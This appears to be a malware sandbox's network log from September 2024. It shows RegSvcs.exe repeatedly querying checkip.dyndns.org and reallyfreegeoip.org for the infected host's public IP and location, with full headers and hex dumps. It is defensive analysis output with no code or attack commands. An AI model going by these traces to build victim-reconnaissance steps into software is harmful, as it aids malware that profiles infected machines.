                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    6192.168.2.549717193.122.130.0806004C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Sep 25, 2024 15:34:20.263055086 CEST151OUTGET / HTTP/1.1
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                    Host: checkip.dyndns.org
                                                                    Connection: Keep-Alive
                                                                    Sep 25, 2024 15:34:20.725817919 CEST320INHTTP/1.1 200 OK
                                                                    Date: Wed, 25 Sep 2024 13:34:20 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 103
                                                                    Connection: keep-alive
                                                                    Cache-Control: no-cache
                                                                    Pragma: no-cache
                                                                    X-Request-ID: b1545772d4d95aeb29cb74516f39c673
                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    7192.168.2.549719193.122.130.0806004C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Sep 25, 2024 15:34:21.348597050 CEST151OUTGET / HTTP/1.1
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                    Host: checkip.dyndns.org
                                                                    Connection: Keep-Alive
                                                                    Sep 25, 2024 15:34:21.814506054 CEST320INHTTP/1.1 200 OK
                                                                    Date: Wed, 25 Sep 2024 13:34:21 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 103
                                                                    Connection: keep-alive
                                                                    Cache-Control: no-cache
                                                                    Pragma: no-cache
                                                                    X-Request-ID: b63a627f0f92aa35eb4f9d16e696291e
                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    8192.168.2.549728193.122.130.0806488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Sep 25, 2024 15:34:31.018636942 CEST151OUTGET / HTTP/1.1
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                    Host: checkip.dyndns.org
                                                                    Connection: Keep-Alive
                                                                    Sep 25, 2024 15:34:31.474561930 CEST320INHTTP/1.1 200 OK
                                                                    Date: Wed, 25 Sep 2024 13:34:31 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 103
                                                                    Connection: keep-alive
                                                                    Cache-Control: no-cache
                                                                    Pragma: no-cache
                                                                    X-Request-ID: c9113f6fa16125a0ab7f6f724811cbbc
                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                    Sep 25, 2024 15:34:31.478653908 CEST127OUTGET / HTTP/1.1
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                    Host: checkip.dyndns.org
                                                                    Sep 25, 2024 15:34:31.596568108 CEST320INHTTP/1.1 200 OK
                                                                    Date: Wed, 25 Sep 2024 13:34:31 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 103
                                                                    Connection: keep-alive
                                                                    Cache-Control: no-cache
                                                                    Pragma: no-cache
                                                                    X-Request-ID: 4741f1ed4f3a36589b9052b7c1f093b5
                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                    Sep 25, 2024 15:34:32.305228949 CEST127OUTGET / HTTP/1.1
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                    Host: checkip.dyndns.org
                                                                    Sep 25, 2024 15:34:32.405152082 CEST320INHTTP/1.1 200 OK
                                                                    Date: Wed, 25 Sep 2024 13:34:32 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 103
                                                                    Connection: keep-alive
                                                                    Cache-Control: no-cache
                                                                    Pragma: no-cache
                                                                    X-Request-ID: 5dda7219ae3fef23507408e1e0226a8f
                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    9192.168.2.549731193.122.130.0806488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Sep 25, 2024 15:34:33.036124945 CEST127OUTGET / HTTP/1.1
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                    Host: checkip.dyndns.org
                                                                    Sep 25, 2024 15:34:33.498054981 CEST320INHTTP/1.1 200 OK
                                                                    Date: Wed, 25 Sep 2024 13:34:33 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 103
                                                                    Connection: keep-alive
                                                                    Cache-Control: no-cache
                                                                    Pragma: no-cache
                                                                    X-Request-ID: 5d0c420524685886a115fca9860f305b
                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    10192.168.2.549733193.122.130.0806488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Sep 25, 2024 15:34:34.472502947 CEST151OUTGET / HTTP/1.1
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                    Host: checkip.dyndns.org
                                                                    Connection: Keep-Alive
                                                                    Sep 25, 2024 15:34:34.946387053 CEST320INHTTP/1.1 200 OK
                                                                    Date: Wed, 25 Sep 2024 13:34:34 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 103
                                                                    Connection: keep-alive
                                                                    Cache-Control: no-cache
                                                                    Pragma: no-cache
                                                                    X-Request-ID: 2ae81f88f3f93c1844e459ac0713d7fe
                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    11192.168.2.549735193.122.130.0806488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Sep 25, 2024 15:34:35.561443090 CEST151OUTGET / HTTP/1.1
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                    Host: checkip.dyndns.org
                                                                    Connection: Keep-Alive
                                                                    Sep 25, 2024 15:34:36.024744987 CEST320INHTTP/1.1 200 OK
                                                                    Date: Wed, 25 Sep 2024 13:34:35 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 103
                                                                    Connection: keep-alive
                                                                    Cache-Control: no-cache
                                                                    Pragma: no-cache
                                                                    X-Request-ID: c68bdbf24f8f016fce02a24ec5afe8af
                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    12192.168.2.549737193.122.130.0806488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Sep 25, 2024 15:34:36.642313957 CEST151OUTGET / HTTP/1.1
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                    Host: checkip.dyndns.org
                                                                    Connection: Keep-Alive
                                                                    Sep 25, 2024 15:34:37.116503000 CEST320INHTTP/1.1 200 OK
                                                                    Date: Wed, 25 Sep 2024 13:34:37 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 103
                                                                    Connection: keep-alive
                                                                    Cache-Control: no-cache
                                                                    Pragma: no-cache
                                                                    X-Request-ID: 9f814e9cf86dee37d8164883531765b0
                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    13192.168.2.549739193.122.130.0806488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Sep 25, 2024 15:34:37.747138023 CEST151OUTGET / HTTP/1.1
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                    Host: checkip.dyndns.org
                                                                    Connection: Keep-Alive
                                                                    Sep 25, 2024 15:34:38.398482084 CEST320INHTTP/1.1 200 OK
                                                                    Date: Wed, 25 Sep 2024 13:34:38 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 103
                                                                    Connection: keep-alive
                                                                    Cache-Control: no-cache
                                                                    Pragma: no-cache
                                                                    X-Request-ID: 5c22cf59da77439e02f31bb7a2c233c0
                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                    Sep 25, 2024 15:34:38.416734934 CEST320INHTTP/1.1 200 OK
                                                                    Date: Wed, 25 Sep 2024 13:34:38 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 103
                                                                    Connection: keep-alive
                                                                    Cache-Control: no-cache
                                                                    Pragma: no-cache
                                                                    X-Request-ID: 5c22cf59da77439e02f31bb7a2c233c0
                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    14192.168.2.549741193.122.130.0806488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Sep 25, 2024 15:34:39.069367886 CEST151OUTGET / HTTP/1.1
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                    Host: checkip.dyndns.org
                                                                    Connection: Keep-Alive
                                                                    Sep 25, 2024 15:34:39.526000023 CEST320INHTTP/1.1 200 OK
                                                                    Date: Wed, 25 Sep 2024 13:34:39 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 103
                                                                    Connection: keep-alive
                                                                    Cache-Control: no-cache
                                                                    Pragma: no-cache
                                                                    X-Request-ID: d7a77d1d145cef8642de3d5be1acac27
                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    15192.168.2.549743193.122.130.0806488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Sep 25, 2024 15:34:40.433010101 CEST151OUTGET / HTTP/1.1
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                    Host: checkip.dyndns.org
                                                                    Connection: Keep-Alive
                                                                    Sep 25, 2024 15:34:40.888156891 CEST320INHTTP/1.1 200 OK
                                                                    Date: Wed, 25 Sep 2024 13:34:40 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 103
                                                                    Connection: keep-alive
                                                                    Cache-Control: no-cache
                                                                    Pragma: no-cache
                                                                    X-Request-ID: 82810f43b621c3e679cba772f4b99f7e
                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    0192.168.2.549705188.114.97.34436004C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-09-25 13:34:13 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                    Host: reallyfreegeoip.org
                                                                    Connection: Keep-Alive
                                                                    2024-09-25 13:34:13 UTC678INHTTP/1.1 200 OK
                                                                    Date: Wed, 25 Sep 2024 13:34:13 GMT
                                                                    Content-Type: application/xml
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    access-control-allow-origin: *
                                                                    vary: Accept-Encoding
                                                                    Cache-Control: max-age=86400
                                                                    CF-Cache-Status: HIT
                                                                    Age: 23312
                                                                    Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o6j%2BbE1PL6vlDG5jw7ViW%2Bw2yLYOdvXFcrkZXWQdjR41acugkm6sDGFVEDJQeoxMQXFo2T01nfq77z3m3ErG7DrAEzAwazIvmJUA1hJnJPI0rMRDR2%2FdfBVrBgh%2FJmq6Apg7JzJe"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8c8b63f879e60ca4-EWR
                                                                    2024-09-25 13:34:13 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                    2024-09-25 13:34:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    1192.168.2.549706188.114.97.34436004C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-09-25 13:34:14 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                    Host: reallyfreegeoip.org
                                                                    2024-09-25 13:34:14 UTC680INHTTP/1.1 200 OK
                                                                    Date: Wed, 25 Sep 2024 13:34:14 GMT
                                                                    Content-Type: application/xml
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    access-control-allow-origin: *
                                                                    vary: Accept-Encoding
                                                                    Cache-Control: max-age=86400
                                                                    CF-Cache-Status: HIT
                                                                    Age: 23313
                                                                    Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q9cGDEOmg6bxp9ypCEtERbnrWTS%2Bt1jle3TELu8Yc49mGAm73LSOkmQ8cbiGpgjCCfVDWrsV3ia88v2kw9x%2B4ahIrXzZod38NzsjI%2Fj1kZONv%2BcwCPcOB9E%2Bm0ZxbVgRzB1nr0EY"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8c8b63fd5a5641e7-EWR
                                                                    2024-09-25 13:34:14 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                    2024-09-25 13:34:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    2192.168.2.549708188.114.97.34436004C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-09-25 13:34:15 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                    Host: reallyfreegeoip.org
                                                                    Connection: Keep-Alive
                                                                    2024-09-25 13:34:15 UTC684INHTTP/1.1 200 OK
                                                                    Date: Wed, 25 Sep 2024 13:34:15 GMT
                                                                    Content-Type: application/xml
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    access-control-allow-origin: *
                                                                    vary: Accept-Encoding
                                                                    Cache-Control: max-age=86400
                                                                    CF-Cache-Status: HIT
                                                                    Age: 23314
                                                                    Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zS4k%2BiwWLqF3wHz7SJgP9Lwp7znzbhH7rge4te5MAGbji%2FnWlUt2dRZG8bnYj%2BKvfu81kxeafhQPv%2FbTDm%2FPaTNigI1XqCRtlLXmgKZTa6kbZ%2FezgAWGf6dUzBAUqmPBbzaLn5n%2B"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8c8b64041c9f4228-EWR
                                                                    2024-09-25 13:34:15 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                    2024-09-25 13:34:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    3192.168.2.549710188.114.97.34436004C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-09-25 13:34:16 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                    Host: reallyfreegeoip.org
                                                                    Connection: Keep-Alive
                                                                    2024-09-25 13:34:16 UTC670INHTTP/1.1 200 OK
                                                                    Date: Wed, 25 Sep 2024 13:34:16 GMT
                                                                    Content-Type: application/xml
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    access-control-allow-origin: *
                                                                    vary: Accept-Encoding
                                                                    Cache-Control: max-age=86400
                                                                    CF-Cache-Status: HIT
                                                                    Age: 23315
                                                                    Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BDWlz6TpRHvlmpid2XQ15JZG8MbeKB5rQN9FluskF0FqnJnzz3dxQDyvublv8XTVG9qWl0YrjYt9HxioBipo2oC49KgI16FsNmrKMfjyi6lCcT3WW2azAkJT2qaVf17ZybIV9Ezk"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8c8b640b09ff436d-EWR
